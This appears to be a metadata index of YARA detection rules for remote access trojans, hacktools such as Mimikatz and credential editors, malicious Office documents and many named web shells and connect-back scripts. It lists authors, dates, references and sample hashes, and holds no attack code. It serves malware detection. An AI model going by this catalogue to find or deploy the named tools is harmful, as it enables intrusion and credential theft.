malware_index Sub7Nation author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Sub7Nation maltype: Remote Access Trojan filetype: exe
malware_index UPX author: Kevin Breen <kevin@techanarchy.net> date: 2014/04
malware_index Vertex author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Vertex maltype: Remote Access Trojan filetype: exe
malware_index unrecom author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/AAR maltype: Remote Access Trojan filetype: exe
malware_index ShadowTech author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/ShadowTech maltype: Remote Access Trojan filetype: exe
malware_index shimrat description: Detects ShimRat and the ShimRat loader author: Yonathan Klijnsma (yonathan.klijnsma@fox-it.com) date: 20/11/2015 ref: https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/
malware_index shimratreporter description: Detects ShimRatReporter author: Yonathan Klijnsma (yonathan.klijnsma@fox-it.com) date: 20/11/2015 ref: https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/
malware_index TerminatorRat description: Terminator RAT author: Jean-Philippe Teissier / @Jipe_ date: 2013-10-24 filetype: memory version: 1.0 ref1: http://www.fireeye.com/blog/technical/malware-research/2013/10/evasive-tactics-terminator-rat.html
malware_index TROJAN_Notepad_shell_crew author: RSA_IR Date: 4Jun13 File: notepad.exe v 1.1 MD5: 106E63DBDA3A76BEEB53A8BBD8F98927
malware_index xtreme_rat author: Kevin Falcoz date: 23/02/2013 description: Xtreme RAT
malware_index XtremeRATCode description: XtremeRAT code features author: Seth Hardy last_modified: 2014-07-09
malware_index XtremeRATStrings description: XtremeRAT Identifying Strings author: Seth Hardy last_modified: 2014-07-09
malware_index XtremeRAT description: XtremeRAT author: Seth Hardy last_modified: 2014-07-09
malware_index xtremrat author: Jean-Philippe Teissier / @Jipe_ description: Xtrem RAT v3.5 date: 2012-07-12 version: 1.0 filetype: memory
malware_index zoxPNG_RAT Author: Novetta Advanced Research Group Date: 2014/11/14 Description: ZoxPNG RAT, url inside Reference: http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf
malware_index xRAT author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/xRat maltype: Remote Access Trojan filetype: exe
malware_index xRAT20 author: Rottweiler date: 2015-08-20 description: Identifies xRAT 2.0 samples maltype: Remote Access Trojan hash0: cda610f9cba6b6242ebce9f31faf5d9c hash1: 60d7b0d2dfe937ac6478807aa7043525 hash2: d1b577fbfd25cc5b873b202cfe61b5b8 hash3: 1820fa722906569e3f209d1dab3d1360 hash4: 8993b85f5c138b0afacc3ff04a2d7871 hash5: 0c231ed8a800b0f17f897241f1d5f4e3 hash8: 2c198e3e0e299a51e5d955bb83c62a5e sample_filetype: exe yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
malware_index HTTPSCANNER description: Chinese Hacktool Set - file HTTPSCANNER.EXE author: Florian Roth reference: http://tools.zjqhr.com/ date: 2015-06-13 hash: ae2929346944c1ea3411a4562e9d5e2f765d088a
malware_index dubrute author: Christian Rebischke (@sh1bumi) date: 2015-09-05 description: Rules for DuBrute Bruteforcer in_the_wild: True family: Hackingtool/Bruteforcer
malware_index Powerkatz_DLL_Generic description: Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible) author: Florian Roth reference: PowerKatz Analysis date: 2016-02-05 super_rule: 1 score: 80 hash1: c20f30326fcebad25446cf2e267c341ac34664efad5c50ff07f0738ae2390eae hash2: 1e67476281c1ec1cf40e17d7fc28a3ab3250b474ef41cb10a72130990f0be6a0 hash3: 49e7bac7e0db87bf3f0185e9cf51f2539dbc11384fefced465230c4e5bce0872
malware_index WindowsCredentialEditor description: Windows Credential Editor threat_level: 10 score: 90
malware_index Amplia_Security_Tool description: Amplia Security Tool score: 60 nodeepdive: 1
malware_index PScan_Portscan_1 description: PScan - Port Scanner author: F. Roth score: 50
malware_index HackTool_Samples description: Hacktool score: 50
malware_index Fierce2 author: Florian Roth description: This signature detects the Fierce2 domain scanner date: 07/2014 score: 60
malware_index Ncrack author: Florian Roth description: This signature detects the Ncrack brute force tool date: 07/2014 score: 60
malware_index SQLMap author: Florian Roth description: This signature detects the SQLMap SQL injection tool date: 07/2014 score: 60
malware_index PortScanner description: Auto-generated rule on file PortScanner.exe author: yarGen Yara Rule Generator by Florian Roth hash: b381b9212282c0c650cb4b0323436c63
malware_index NetBIOS_Name_Scanner description: Auto-generated rule on file NetBIOS Name Scanner.exe author: yarGen Yara Rule Generator by Florian Roth hash: 888ba1d391e14c0a9c829f5a1964ca2c
malware_index FeliksPack3___Scanners_ipscan description: Auto-generated rule on file ipscan.exe author: yarGen Yara Rule Generator by Florian Roth hash: 6c1bcf0b1297689c8c4c12cc70996a75
malware_index CGISscan_CGIScan description: Auto-generated rule on file CGIScan.exe author: yarGen Yara Rule Generator by Florian Roth hash: 338820e4e8e7c943074d5a5bc832458a
malware_index IP_Stealing_Utilities description: Auto-generated rule on file IP Stealing Utilities.exe author: yarGen Yara Rule Generator by Florian Roth hash: 65646e10fb15a2940a37c5ab9f59c7fc
malware_index PortRacer description: Auto-generated rule on file PortRacer.exe author: yarGen Yara Rule Generator by Florian Roth hash: 2834a872a0a8da5b1be5db65dfdef388
malware_index scanarator description: Auto-generated rule on file scanarator.exe author: yarGen Yara Rule Generator by Florian Roth hash: 848bd5a518e0b6c05bd29aceb8536c46
malware_index _Bitchin_Threads_ description: Auto-generated rule on file =Bitchin Threads=.exe author: yarGen Yara Rule Generator by Florian Roth hash: 7491b138c1ee5a0d9d141fbfd1f0071b
malware_index portscan description: Auto-generated rule on file portscan.exe author: yarGen Yara Rule Generator by Florian Roth hash: a8bfdb2a925e89a281956b1e3bb32348
malware_index ProPort_zip_Folder_ProPort description: Auto-generated rule on file ProPort.exe author: yarGen Yara Rule Generator by Florian Roth hash: c1937a86939d4d12d10fc44b7ab9ab27
malware_index StealthWasp_s_Basic_PortScanner_v1_2 description: Auto-generated rule on file StealthWasp's Basic PortScanner v1.2.exe author: yarGen Yara Rule Generator by Florian Roth hash: 7c0f2cab134534cd35964fe4c6a1ff00
malware_index BluesPortScan description: Auto-generated rule on file BluesPortScan.exe author: yarGen Yara Rule Generator by Florian Roth hash: 6292f5fc737511f91af5e35643fc9eef
malware_index scanarator_iis description: Auto-generated rule on file iis.exe author: yarGen Yara Rule Generator by Florian Roth hash: 3a8fc02c62c8dd65e038cc03e5451b6e
malware_index Angry_IP_Scanner_v2_08_ipscan description: Auto-generated rule on file ipscan.exe author: yarGen Yara Rule Generator by Florian Roth hash: 70cf2c09776a29c3e837cb79d291514a
malware_index crack_Loader description: Auto-generated rule on file Loader.exe author: yarGen Yara Rule Generator by Florian Roth hash: f4f79358a6c600c1f0ba1f7e4879a16d
malware_index WCE_Modified_1_1014 description: Modified (packed) version of Windows Credential Editor author: Florian Roth hash: 09a412ac3c85cedce2642a19e99d8f903a2e0354 score: 70
malware_index BypassUac_3 description: Auto-generated rule - file BypassUacDll.dll author: yarGen Yara Rule Generator hash: 1974aacd0ed987119999735cad8413031115ce35
malware_index APT_Proxy_Malware_Packed_dev author: FRoth date: 2014-11-10 description: APT Malware - Proxy hash: 6b6a86ceeab64a6cb273debfa82aec58 score: 50
malware_index Hacktools_CN_Panda_Burst description: Disclosed hacktool set - file Burst.rar author: Florian Roth date: 17.11.14 score: 60 hash: ce8e3d95f89fb887d284015ff2953dbdb1f16776
malware_index Hacktools_CN_Burst_Blast description: Disclosed hacktool set - file Blast.bat author: Florian Roth date: 17.11.14 score: 60 hash: b07702a381fa2eaee40b96ae2443918209674051
malware_index Jc_WinEggDrop_Shell description: Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt author: Florian Roth date: 23.11.14 score: 60 hash: 820674b59f32f2cf72df50ba4411d7132d863ad2
malware_index LinuxHacktool_eyes_pscan2 description: Linux hack tools - file pscan2 author: Florian Roth reference: not set date: 2015/01/19 hash: 56b476cba702a4423a2d805a412cae8ef4330905
malware_index CN_Portscan description: CN Port Scanner author: Florian Roth release_date: 2013-11-29 confidential: False score: 70
malware_index Mimikatz_Memory_Rule_1 author: Florian Roth date: 12/22/2014 score: 70 type: memory description: Detects password dumper mimikatz in memory
malware_index Mimikatz_Memory_Rule_2 description: Mimikatz Rule generated from a memory dump author: Florian Roth - Florian Roth type: memory score: 80
malware_index VSSown_VBS description: Detects VSSown.vbs script - used to export shadow copy elements like NTDS to take away and crack elsewhere author: Florian Roth date: 2015-10-01 score: 75
malware_index Payload_Exe2Hex description: Detects payload generated by exe2hex author: Florian Roth reference: https://github.com/g0tmi1k/exe2hex date: 2016-01-15 score: 70
maldocs_index Contains_hidden_PE_File_inside_a_sequence_of_numbers author: Martin Willing (https://evild3ad.com) description: Detect a hidden PE file inside a sequence of numbers (comma separated) reference: http://www.welivesecurity.com/2016/01/04/blackenergy-trojan-strikes-again-attacks-ukrainian-electric-power-industry/ date: 2016-01-09 filetype: decompressed VBA macro code
maldocs_index possible_exploit author: Glenn Edwards (@hiddenillusion) version: 0.1 weight: 3
maldocs_index XDP_embedded_PDF author: Glenn Edwards (@hiddenillusion) version: 0.1 ref: http://blog.9bplus.com/av-bypass-for-malicious-pdfs-using-xdp weight: 1
maldocs_index powershell
maldocs_index Contains_UserForm_Object author: Martin Willing (https://evild3ad.com) description: Detect UserForm object in MS Office document reference: https://msdn.microsoft.com/en-us/library/office/gg264663.aspx date: 2016-03-05 filetype: Office documents
maldocs_index malrtf_ole2link author: @h3x2b <tracker _AT h3x.eu> description: Detect weaponized RTF documents with OLE2Link exploit
maldocs_index maldoc_API_hashing author: Didier Stevens (https://DidierStevens.com)
maldocs_index maldoc_indirect_function_call_1 author: Didier Stevens (https://DidierStevens.com)
maldocs_index maldoc_indirect_function_call_2 author: Didier Stevens (https://DidierStevens.com)
maldocs_index maldoc_indirect_function_call_3 author: Didier Stevens (https://DidierStevens.com)
maldocs_index maldoc_find_kernel32_base_method_1 author: Didier Stevens (https://DidierStevens.com)
maldocs_index maldoc_getEIP_method_1 author: Didier Stevens (https://DidierStevens.com)
maldocs_index macrocheck Author: Fireeye Labs Date: 2014/11/30 Description: Identify office documents with the MACROCHECK credential stealer in them. It can be run against .doc files or VBA macros extraced from .docx files (vbaProject.bin files). Reference: https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html
webshells_index Backdoor_WebShell_asp description: Detect ASPXSpy author: xylitol@temari.fr date: 2019-02-26
webshells_index webshell_iMHaPFtp_2 description: Web Shell - file iMHaPFtp.php author: Florian Roth date: 2014/01/28 score: 70 hash: 12911b73bc6a5d313b494102abcf5c57
webshells_index webshell_caidao_shell_guo description: Web Shell - file guo.php author: Florian Roth date: 2014/01/28 score: 70 hash: 9e69a8f499c660ee0b4796af14dc08f0
webshells_index webshell_cihshell_fix description: Web Shell - file cihshell_fix.php author: Florian Roth date: 2014/01/28 score: 70 hash: 3823ac218032549b86ee7c26f10c4cb5
webshells_index webshell_asp_EFSO_2 description: Web Shell - file EFSO_2.asp author: Florian Roth date: 2014/01/28 score: 70 hash: a341270f9ebd01320a7490c12cb2e64c
webshells_index webshell_caidao_shell_ice_2 description: Web Shell - file ice.php author: Florian Roth date: 2014/01/28 score: 70 hash: 1d6335247f58e0a5b03e17977888f5f2
webshells_index webshell_asp_ice description: Web Shell - file ice.asp author: Florian Roth date: 2014/01/28 score: 70 hash: d141e011a92f48da72728c35f1934a2b
webshells_index webshell_asp_404 description: Web Shell - file 404.asp author: Florian Roth date: 2014/01/28 score: 70 hash: d9fa1e8513dbf59fa5d130f389032a2d
webshells_index webshell_webshell_cnseay02_1 description: Web Shell - file webshell-cnseay02-1.php author: Florian Roth date: 2014/01/28 score: 70 hash: 95fc76081a42c4f26912826cb1bd24b1
webshells_index webshell_php_fbi description: Web Shell - file fbi.php author: Florian Roth date: 2014/01/28 score: 70 hash: 1fb32f8e58c8deb168c06297a04a21f1
webshells_index webshell_B374kPHP_B374k description: Web Shell - file B374k.php author: Florian Roth date: 2014/01/28 score: 70 hash: bed7388976f8f1d90422e8795dff1ea6
webshells_index webshell_caidao_shell_404 description: Web Shell - file 404.php author: Florian Roth date: 2014/01/28 score: 70 hash: ee94952dc53d9a29bdf4ece54c7a7aa7
webshells_index webshell_ASP_aspydrv description: Web Shell - file aspydrv.asp author: Florian Roth date: 2014/01/28 score: 70 hash: de0a58f7d1e200d0b2c801a94ebce330
webshells_index webshell_Dx_Dx description: Web Shell - file Dx.php author: Florian Roth date: 2014/01/28 score: 70 hash: 9cfe372d49fe8bf2fac8e1c534153d9b
webshells_index webshell_MySQL_Web_Interface_Version_0_8 description: Web Shell - file MySQL Web Interface Version 0.8.php author: Florian Roth date: 2014/01/28 score: 70 hash: 36d4f34d0a22080f47bb1cb94107c60f
webshells_index webshell_wsb_idc description: Web Shell - file idc.php author: Florian Roth date: 2014/01/28 score: 70 hash: 7c5b1b30196c51f1accbffb80296395f
webshells_index webshell_webshell_cnseay_x description: Web Shell - file webshell-cnseay-x.php author: Florian Roth date: 2014/01/28 score: 70 hash: a0f9f7f5cd405a514a7f3be329f380e5
webshells_index webshell_phpkit_0_1a_odd description: Web Shell - file odd.php author: Florian Roth date: 2014/01/28 score: 70 hash: 3c30399e7480c09276f412271f60ed01
webshells_index webshell_Java_Shell description: Web Shell - file Java Shell.jsp author: Florian Roth date: 2014/01/28 score: 70 hash: 36403bc776eb12e8b7cc0eb47c8aac83
webshells_index webshell_simple_backdoor description: Web Shell - file simple-backdoor.php author: Florian Roth date: 2014/01/28 score: 70 hash: f091d1b9274c881f8e41b2f96e6b9936
webshells_index webshell_PHP_c37 description: Web Shell - file c37.php author: Florian Roth date: 2014/01/28 score: 70 hash: d01144c04e7a46870a8dd823eb2fe5c8
webshells_index webshell_PHP_b37 description: Web Shell - file b37.php author: Florian Roth date: 2014/01/28 score: 70 hash: 0421445303cfd0ec6bc20b3846e30ff0
webshells_index webshell_ghost_source_icesword_silic description: Web Shell - from files ghost_source.php, icesword.php, silic.php author: Florian Roth date: 2014/01/28 score: 70 super_rule: 1 hash0: cbf64a56306c1b5d98898468fc1fdbd8 hash1: 6e20b41c040efb453d57780025a292ae hash2: 437d30c94f8eef92dc2f064de4998695
webshells_index webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx description: Web Shell - from files gfs_sh.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php author: Florian Roth date: 2014/01/28 score: 70 super_rule: 1 hash0: a2516ac6ee41a7cf931cbaef1134a9e4 hash1: ef43fef943e9df90ddb6257950b3538f hash2: ae025c886fbe7f9ed159f49593674832 hash3: 911195a9b7c010f61b66439d9048f400 hash4: 697dae78c040150daff7db751fc0c03c hash5: 513b7be8bd0595c377283a7c87b44b2e hash6: 1d912c55b96e2efe8ca873d6040e3b30 hash7: e5b2131dd1db0dbdb43b53c5ce99016a hash8: 4108f28a9792b50d95f95b9e5314fa1e hash9: 41af6fd253648885c7ad2ed524e0692d hash10: 6fcc283470465eed4870bcc3e2d7f14d
webshells_index webshell_itsec_PHPJackal_itsecteam_shell_jHn description: Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php author: Florian Roth date: 2014/01/28 score: 70 super_rule: 1 hash0: 8ae9d2b50dc382f0571cd7492f079836 hash1: e2830d3286001d1455479849aacbbb38 hash2: bd6d3b2763c705a01cc2b3f105a25fa4 hash3: 40c6ecf77253e805ace85f119fe1cebb
webshells_index webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY description: Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php author: Florian Roth date: 2014/01/28 score: 70 super_rule: 1 hash0: b68bfafc6059fd26732fa07fb6f7f640 hash1: 42f211cec8032eb0881e87ebdb3d7224 hash2: 40a1f840111996ff7200d18968e42cfe hash3: 0712e3dc262b4e1f98ed25760b206836
webshells_index webshell_webshells_new_con2 description: Web shells - generated from file con2.asp author: Florian Roth date: 2014/03/28 score: 70 hash: d3584159ab299d546bd77c9654932ae3
webshells_index webshell_Expdoor_com_ASP description: Web shells - generated from file Expdoor.com ASP.asp author: Florian Roth date: 2014/03/28 score: 70 hash: caef01bb8906d909f24d1fa109ea18a7
webshells_index webshell_webshells_new_php2 description: Web shells - generated from file php2.php author: Florian Roth date: 2014/03/28 score: 70 hash: fbf2e76e6f897f6f42b896c855069276
webshells_index webshell_bypass_iisuser_p description: Web shells - generated from file bypass-iisuser-p.asp author: Florian Roth date: 2014/03/28 score: 70 hash: 924d294400a64fa888a79316fb3ccd90
webshells_index webshell_sig_404super description: Web shells - generated from file 404super.php author: Florian Roth date: 2014/03/28 score: 70 hash: 7ed63176226f83d36dce47ce82507b28
webshells_index webshell_webshells_new_JSP description: Web shells - generated from file JSP.jsp author: Florian Roth date: 2014/03/28 score: 70 hash: 495f1a0a4c82f986f4bdf51ae1898ee7
webshells_index webshell_dev_core description: Web shells - generated from file dev_core.php author: Florian Roth date: 2014/03/28 score: 70 hash: 55ad9309b006884f660c41e53150fc2e
webshells_index webshell_webshells_new_pHp description: Web shells - generated from file pHp.php author: Florian Roth date: 2014/03/28 score: 70 hash: b0e842bdf83396c3ef8c71ff94e64167
webshells_index webshell_webshells_new_pppp description: Web shells - generated from file pppp.php author: Florian Roth date: 2014/03/28 score: 70 hash: cf01cb6e09ee594545693c5d327bdd50
webshells_index webshell_webshells_new_code description: Web shells - generated from file code.php author: Florian Roth date: 2014/03/28 score: 70 hash: a444014c134ff24c0be5a05c02b81a79
webshells_index webshell_webshells_new_xxxx description: Web shells - generated from file xxxx.php author: Florian Roth date: 2014/03/28 score: 70 hash: 5bcba70b2137375225d8eedcde2c0ebb
webshells_index webshell_webshells_new_PHP1 description: Web shells - generated from file PHP1.php author: Florian Roth date: 2014/03/28 score: 70 hash: 14c7281fdaf2ae004ca5fec8753ce3cb
webshells_index webshell_webshells_new_php6 description: Web shells - generated from file php6.php author: Florian Roth date: 2014/03/28 score: 70 hash: ea75280224a735f1e445d244acdfeb7b
webshells_index webshell_GetPostpHp description: Web shells - generated from file GetPostpHp.php author: Florian Roth date: 2014/03/28 score: 70 hash: 20ede5b8182d952728d594e6f2bb5c76
webshells_index webshell_webshells_new_php5 description: Web shells - generated from file php5.php author: Florian Roth date: 2014/03/28 score: 70 hash: cf2ab009cbd2576a806bfefb74906fdf
webshells_index perlbot_pl description: Semi-Auto-generated - file perlbot.pl.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 7e4deb9884ffffa5d82c22f8dc533a45
webshells_index php_backdoor_php description: Semi-Auto-generated - file php-backdoor.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 2b5cb105c4ea9b5ebc64705b4bd86bf7
webshells_index Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php description: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: c6eeacbe779518ea78b8f7ed5f63fc11
webshells_index shankar_php_php description: Semi-Auto-generated - file shankar.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 6eb9db6a3974e511b7951b8f7e7136bb
webshells_index Casus15_php_php description: Semi-Auto-generated - file Casus15.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 5e2ede2d1c4fa1fcc3cbfe0c005d7b13
webshells_index small_php_php description: Semi-Auto-generated - file small.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: fcee6226d09d150bfa5f103bee61fbde
webshells_index shellbot_pl description: Semi-Auto-generated - file shellbot.pl.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: b2a883bc3c03a35cfd020dd2ace4bab8
webshells_index fuckphpshell_php description: Semi-Auto-generated - file fuckphpshell.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 554e50c1265bb0934fcc8247ec3b9052
webshells_index ngh_php_php description: Semi-Auto-generated - file ngh.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: c372b725419cdfd3f8a6371cfeebc2fd
webshells_index jsp_reverse_jsp description: Semi-Auto-generated - file jsp-reverse.jsp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 8b0e6779f25a17f0ffb3df14122ba594
webshells_index Tool_asp description: Semi-Auto-generated - file Tool.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 8febea6ca6051ae5e2ad4c78f4b9c1f2
webshells_index NT_Addy_asp description: Semi-Auto-generated - file NT Addy.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 2e0d1bae844c9a8e6e351297d77a1fec
webshells_index SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php description: Semi-Auto-generated - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 089ff24d978aeff2b4b2869f0c7d38a3
webshells_index phvayvv_php_php description: Semi-Auto-generated - file phvayvv.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 35fb37f3c806718545d97c6559abd262
webshells_index r57shell_php_php description: Semi-Auto-generated - file r57shell.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: d28445de424594a5f14d0fe2a7c4e94f
webshells_index rst_sql_php_php description: Semi-Auto-generated - file rst_sql.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 0961641a4ab2b8cb4d2beca593a92010
webshells_index wh_bindshell_py description: Semi-Auto-generated - file wh_bindshell.py.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: fab20902862736e24aaae275af5e049c
webshells_index lurm_safemod_on_cgi description: Semi-Auto-generated - file lurm_safemod_on.cgi.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 5ea4f901ce1abdf20870c214b3231db3
webshells_index c99madshell_v2_0_php_php description: Semi-Auto-generated - file c99madshell_v2.0.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: d27292895da9afa5b60b9d3014f39294
webshells_index w3d_php_php description: Semi-Auto-generated - file w3d.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 987f66b29bfb209a0b4f097f84f57c3b
webshells_index WinX_Shell_html description: Semi-Auto-generated - file WinX Shell.html.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 17ab5086aef89d4951fe9b7c7a561dda
webshells_index Dx_php_php description: Semi-Auto-generated - file Dx.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 9cfe372d49fe8bf2fac8e1c534153d9b
webshells_index csh_php_php description: Semi-Auto-generated - file csh.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 194a9d3f3eac8bc56d9a7c55c016af96
webshells_index pHpINJ_php_php description: Semi-Auto-generated - file pHpINJ.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: d7a4b0df45d34888d5a09f745e85733f
webshells_index sig_2008_php_php description: Semi-Auto-generated - file 2008.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 3e4ba470d4c38765e4b16ed930facf2c
webshells_index ak74shell_php_php description: Semi-Auto-generated - file ak74shell.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 7f83adcb4c1111653d30c6427a94f66f
webshells_index Rem_View_php_php description: Semi-Auto-generated - file Rem View.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 29420106d9a81553ef0d1ca72b9934d9
webshells_index STNC_php_php description: Semi-Auto-generated - file STNC.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 2e56cfd5b5014cbbf1c1e3f082531815
webshells_index aZRaiLPhp_v1_0_php description: Semi-Auto-generated - file aZRaiLPhp v1.0.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 26b2d3943395682e36da06ed493a3715
webshells_index zacosmall_php description: Semi-Auto-generated - file zacosmall.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 5295ee8dc2f5fd416be442548d68f7a6
webshells_index CmdAsp_asp description: Semi-Auto-generated - file CmdAsp.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 64f24f09ec6efaa904e2492dffc518b9
webshells_index simple_backdoor_php description: Semi-Auto-generated - file simple-backdoor.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: f091d1b9274c881f8e41b2f96e6b9936
webshells_index mysql_shell_php description: Semi-Auto-generated - file mysql_shell.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: d42aec2891214cace99b3eb9f3e21a63
webshells_index Dive_Shell_1_0___Emperor_Hacking_Team_php description: Semi-Auto-generated - file Dive Shell 1.0 - Emperor Hacking Team.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 1b5102bdc41a7bc439eea8f0010310a5
webshells_index Asmodeus_v0_1_pl description: Semi-Auto-generated - file Asmodeus v0.1.pl.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 0978b672db0657103c79505df69cb4bb
webshells_index Reader_asp description: Semi-Auto-generated - file Reader.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: ad1a362e0a24c4475335e3e891a01731
webshells_index phpshell17_php description: Semi-Auto-generated - file phpshell17.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 9a928d741d12ea08a624ee9ed5a8c39d
webshells_index SimShell_1_0___Simorgh_Security_MGZ_php description: Semi-Auto-generated - file SimShell 1.0 - Simorgh Security MGZ.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 37cb1db26b1b0161a4bf678a6b4565bd
webshells_index jspshall_jsp description: Semi-Auto-generated - file jspshall.jsp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: efe0f6edaa512c4e1fdca4eeda77b7ee
webshells_index rootshell_php description: Semi-Auto-generated - file rootshell.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 265f3319075536030e59ba2f9ef3eac6
webshells_index connectback2_pl description: Semi-Auto-generated - file connectback2.pl.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 473b7d226ea6ebaacc24504bd740822e
webshells_index shells_PHP_wso description: Semi-Auto-generated - file wso.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 33e2891c13b78328da9062fbfcf898b6
webshells_index backdoor1_php description: Semi-Auto-generated - file backdoor1.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: e1adda1f866367f52de001257b4d6c98
webshells_index elmaliseker_asp description: Semi-Auto-generated - file elmaliseker.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: b32d1730d23a660fd6aa8e60c3dc549f
webshells_index s72_Shell_v1_1_Coding_html description: Semi-Auto-generated - file s72 Shell v1.1 Coding.html.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: c2e8346a5515c81797af36e7e4a3828e
webshells_index hidshell_php_php description: Semi-Auto-generated - file hidshell.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: c2f3327d60884561970c63ffa09439a4
webshells_index kacak_asp description: Semi-Auto-generated - file kacak.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 907d95d46785db21331a0324972dda8c
webshells_index PHP_Backdoor_Connect_pl_php description: Semi-Auto-generated - file PHP Backdoor Connect.pl.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 57fcd9560dac244aeaf95fd606621900
webshells_index Antichat_Socks5_Server_php_php description: Semi-Auto-generated - file Antichat Socks5 Server.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: cbe9eafbc4d86842a61a54d98e5b61f1
webshells_index Antichat_Shell_v1_3_php description: Semi-Auto-generated - file Antichat Shell v1.3.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 40d0abceba125868be7f3f990f031521
webshells_index Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php description: Semi-Auto-generated - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 49ad9117c96419c35987aaa7e2230f63
webshells_index cyberlords_sql_php_php description: Semi-Auto-generated - file cyberlords_sql.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 03b06b4183cb9947ccda2c3d636406d4
webshells_index Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html description: Semi-Auto-generated - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: 8a8c8bb153bd1ee097559041f2e5cf0a
webshells_index EFSO_2_asp description: Semi-Auto-generated - file EFSO_2.asp.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls hash: b5fde9682fd63415ae211d53c6bfaa4d
